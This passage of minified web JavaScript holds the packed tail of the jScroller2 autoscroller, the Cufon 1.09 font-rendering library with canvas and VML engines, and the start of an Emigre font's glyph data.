7(4.w.E(b,4.n.A+\'U\')){p=\'U\'}7(p){4.1C(a[i],p)}}7(!4.18){7(4.6.H>0){4.1m();7(4.n.1h){L(i=0;i<4.6.H;i++){7(4.6[i][3].I>0){G.25("4.F.I("+4.6[i][3].I+",0)",4.6[i][3].I)}}}7(4.n.19===0){7(4.n.1a){4.n.12.13=14.1k;4.J(14,\'26\',4.F.1e)}y{4.J(G,\'1e\',4.F.1e)}4.J(G,\'15\',4.F.15);4.J(G,\'27\',4.F.15);4.J(G,\'28\',4.F.15)}}}}},1C:s(a,b){x i,O=4.6.H,1g=T;7(a&&b){7(O>0){L(i=0;i<O;i++){7(4.6[i][1].6===a){4.6[i][3].p=b;1g=1i}}}}y{1g=1i}7(!1g){x c=0,q=1,Q=0,v,Z,S=a.Y.1d(\' \'),z=a.1q,k={6:1f,l:1f,m:1f};7(z.Y.1c(\'1u\')>=0){z=z.1q}7(z){4.R(z,\'1r\',\'29\');4.R(z,\'2a\',\'2b\');x d=z.1A(\'1B\');L(i=0;i<d.H;i++){7(4.w.E(d[i].Y.1d(\' \'),4.n.A+b+\'1D\')){k.6=d[i]}}7(a){4.R(a,\'1r\',\'1E\');4.u.M(a,0);4.u.r(a,0);X(b){t"C":4.u.M(a,(a.N*-1)+z.N);B;t"U":4.u.r(a,(a.K*-1)+z.K);B}X(b){t"C":t"W":4.u.l(a,z.K);B;t"U":t"r":4.u.m(a,z.N);B}7(k.6){4.R(k.6,\'1r\',\'1E\');k.l=k.6.K;k.m=k.6.N;X(b){t"C":4.u.M(k.6,k.m*-1);B;t"W":4.u.M(k.6,a.N);B;t"r":4.u.r(k.6,a.K);B;t"U":4.u.r(k.6,a.K*-1);B}X(b){t"C":t"W":4.u.r(k.6,0);4.u.l(k.6,z.K);B;t"r":t"U":4.u.M(k.6,0);4.u.m(k.6,z.N);B}}}7(4.w.E(S,4.n.A+\'q-\',1)){q=1x(4.w.E(S,4.n.A+\'q-\',1)||10)/10;7(4.n.1a&&q<1){q=1}}4.n.19=(4.w.E(S,4.n.A+\'2c\')||4.n.19===1)?1:0;v=4.w.E(S,4.n.A+\'v\')?1:0;Z=4.w.E(S,4.n.A+\'Z\')?1:0;7(4.w.E(S,4.n.A+\'I-\',1)){4.n.1h=Q=1;c=4.w.E(S,4.n.A+\'I-\',1)*2d}7(4.w.E(S,4.n.A+\'1F\')){4.J(a,\'1G\',4.F.1n);4.J(a,\'1H\',4.F.1p);7(k.6){4.J(k.6,\'1G\',4.F.1n);4.J(k.6,\'1H\',4.F.1p)}}4.6.2e([{m:z.N,l:z.K},{6:a,m:a.N,l:a.K},{6:k.6,m:k.m,l:k.l},{p:b,q:q,Q:Q,I:c,v:v,Z:Z}])}}},2f:s(a){7(a){L(x i=0;i<4.6.H;i++){7(4.6[i][1].6===a){4.6.2g(i,1)}}7(4.6.H<=0){4.1l()}}},1I:s(){x i,O=4.6.H;L(i=0;i<O;i++){x a=4.6[i][0],o=4.6[i][1],k=4.6[i][2],8=4.6[i][3];7(!8.Q&&!8.I){7(8.Z){o.m=4.6[i][1].m=o.6.N;o.l=4.6[i][1].l=o.6.K;7(k.6){k.m=4.6[i][2].m=k.6.N;k.l=4.6[i][2].l=k.6.K}}X(8.p){t\'C\':t\'W\':x b=4.w.D(o.6.P.M);b=(8.v===2)?((8.p===\'C\')?b-8.q:b+8.q):((8.p===\'C\')?b+8.q:b-8.q);7(k.6&&!8.v){b=4.w.k(8.p,\'M\',b,k.6,o.m,a.m,k.m,8.q,8.v)}y{7(8.v){7(8.v===((8.p===\'C\')?1:2)&&((o.m>a.m&&b+8.q>0)||(o.m<a.m&&b+o.m+8.q>a.m))){4.6[i][3].v=((8.p===\'C\')?2:1)}7(8.v===((8.p===\'C\')?2:1)&&((o.m>a.m&&b+o.m<a.m+8.q)||(o.m<a.m&&b<0))){4.6[i][3].v=((8.p===\'C\')?1:2)}}y{7(8.p===\'C\'){7(b>a.l){b=(o.m)*-1}}y{7(b<o.m*-1){b=a.m}}}}4.u.M(o.6,b);B;t\'r\':t\'U\':x c=4.w.D(o.6.P.r);c=(8.v===2)?((8.p===\'r\')?c+8.q:c-8.q):(8.p===\'r\')?c-8.q:c+8.q;7(k.6&&!8.v){c=4.w.k(8.p,\'r\',c,k.6,o.l,a.l,k.l,8.q,8.v)}y{7(8.v){7(8.v===((8.p===\'r\')?2:1)&&((o.l>a.l&&c+8.q>0)||(o.l<a.l&&c+o.l+8.q>a.l))){4.6[i][3].v=((8.p===\'r\')?1:2)}7(8.v===((8.p===\'r\')?1:2)&&((o.l>a.l&&c+o.l<a.l+8.q)||(o.l<a.l&&c-8.q<0))){4.6[i][3].v=((8.p===\'r\')?2:1)}}y{7(8.p===\'r\'){7(c<o.l*-1){c=a.l}}y{7(c>a.l){c=(o.l)*-1}}}}4.u.r(o.6,c);B}}}},1o:s(a,b){7(a.1s||a.1J){x c=a.1s?a.1s:a.1J;L(x i=0;i<5;i++){7(c.Y.1c(4.n.A+\'1F\')<0&&c.Y.1c(\'1D\')<0){c=c.1q}y{B}}4.Q(c,b)}},1m:s(){7(!4.16){4.18=4.16=G.2h(4.1I,4.11.1t)}},1l:s(){7(4.16){G.2i(4.16);4.18=4.16=T}},Q:s(a,b){7(a&&b>=0){L(x i=0;i<4.6.H;i++){7(a===4.6[i][1].6||a===4.6[i][2].6){4.6[i][3].Q=b}}}},R:s(a,b,c){7(a&&b){7(a.P){7(1v a.P[b]!==\'1w\'){7(c){2j{V(a.P[b]=c)}2k(e){V T}}y{V(a.P[b]===\'\')?((a.1K)?a.1K[b]:((G.1L)?G.1L(a,\'\').2l(b):T)):a.P[b]}}}}},J:s(a,b,c){7(a&&b&&c){7(4.n.1a){a.2m("F"+b,c)}y{a.2n(b,c,T)}}}};4.J(G,\'2o\',4.1y.1z);',62,149,'||||ByRei_jScroller2||obj|if|option||||||||||||endless|width|height|cache|child|direction|speed|left|function|case|set|alternate|get|var|else|parent|prefix|break|down|px|value|on|window|length|delay|set_eventListener|clientWidth|for|top|clientHeight|il|style|pause|_style|classNames|false|right|return|up|switch|className|dynamic||config|last|element|document|focus|timer|regExp|active|ileave|ie|result|indexOf|split|blur|null|error|delayer|true|match|activeElement|stop|start|over|start_stop|out|parentNode|position|target|refreshtime|jscroller2|typeof|undefined|parseFloat|init|main|getElementsByTagName|div|add|_endless|absolute|mousemove|mouseover|mouseout|scroller|srcElement|currentStyle|getComputedStyle|info|Name|ByRei|jScroller2|Version|61|Author|Markus|Bordihn|http|markusbordihn|de|Description|Next|Generation|Autoscroller|150|_|detachEvent|setTimeout|focusout|resize|scroll|relative|overflow|hidden|ignoreleave|1000|push|remove|splice|setInterval|clearInterval|try|catch|getPropertyValue|attachEvent|addEventListener|load'.split('|'),0,{}))
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (C) 2000, Emigre Inc. ; Designed by Zuzana Licko
 * 
 * Manufacturer:
 * C) Emigre Inc
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"84,0r-35,0r-44,-180r34,0r28,141r29,-141r31,0","w":132,"k":{".":18,",":18}},{"d":"43,36r0,-302r74,0r0,22r-49,0r0,258r49,0r0,22r-74,0","w":141},{"d":"33,0r-30,0r58,-248r40,0r58,248r-35,0r-13,-61r-65,0xm104,-92r-25,-136r-26,136r51,0","w":163,"k":{"Y":11,"W":7,"V":7,"T":9,"S":4,"'":22,"\"":22}},{"d":"144,0r-36,0v-11,-32,-26,-61,-35,-95v-8,35,-22,64,-35,95r-34,0r52,-124r-51,-124r37,0r33,91v8,-34,22,-61,34,-91r34,0r-51,120","w":147,"k":{"S":4,"Q":4,"O":4,"G":4,"C":4,".":-7,",":-4}},{"d":"54,-46v-2,27,23,20,33,4r10,-11r0,-127r33,0v1,60,-4,127,4,180v-23,3,-31,-5,-34,-24v-12,12,-24,27,-45,28v-29,0,-34,-25,-35,-54r0,-130r34,0r0,134xm75,-205r-26,0r40,-51r29,0","w":152},{"d":"29,0r0,-248r34,0r0,248r-34,0xm75,-309v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm19,-309v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":91},{"d":"10,0r0,-17r68,-200r-66,0r0,-31r106,0r0,16r-67,200r74,0r0,32r-115,0","w":133,"k":{"O":7,"G":7,"C":7}},{"d":"28,0r0,-248r95,0r0,31r-61,0r0,70r57,0r0,32r-57,0r0,83r65,0r0,32r-99,0xm104,-309v19,0,19,32,0,32v-9,0,-16,-6,-16,-16v0,-10,7,-16,16,-16xm48,-309v8,0,15,7,15,16v0,9,-7,16,-15,16v-9,0,-15,-7,-16,-16v0,-9,7,-15,16,-16","w":144},{"w":64},{"d":"38,34r0,-282r22,0r0,282r-22,0","w":98},{"d":"28,-248v73,-7,122,10,120,80v-2,55,-26,86,-86,81r0,87r-34,0r0,-248xm114,-168v0,-35,-14,-54,-52,-49r0,98v38,5,52,-13,52,-49","w":156,"k":{"q":7,"o":7,"g":7,"e":7,"d":7,"c":7,"a":7,"Z":10,"X":6,"J":4,"A":9,".":32,",":32,"'":-4}},{"d":"55,-115v0,73,32,124,64,164r-27,0v-34,-40,-65,-94,-65,-164v0,-70,31,-124,65,-164r27,0v-32,39,-64,91,-64,164","w":123},{"d":"68,-184v86,0,39,123,57,184r-24,0v-4,-5,-7,-11,-9,-19v-21,35,-81,28,-81,-29v0,-44,27,-65,76,-60v1,-23,2,-47,-22,-46v-20,1,-33,7,-47,15r0,-33v12,-4,32,-12,50,-12xm71,-82v-33,-6,-40,55,-13,59v9,1,22,-13,29,-20r0,-39r-16,0","w":142,"k":{"'":18}},{"d":"59,-205r-20,-25r-21,25r-26,0r40,-51r14,0r40,51r-27,0xm27,0r0,-153r-19,0r0,-27r53,0r0,180r-34,0","w":86},{"d":"95,-205r-20,-25r-21,25r-26,0r40,-51r14,0r40,51r-27,0xm76,-184v50,0,58,40,58,94v0,54,-8,94,-58,9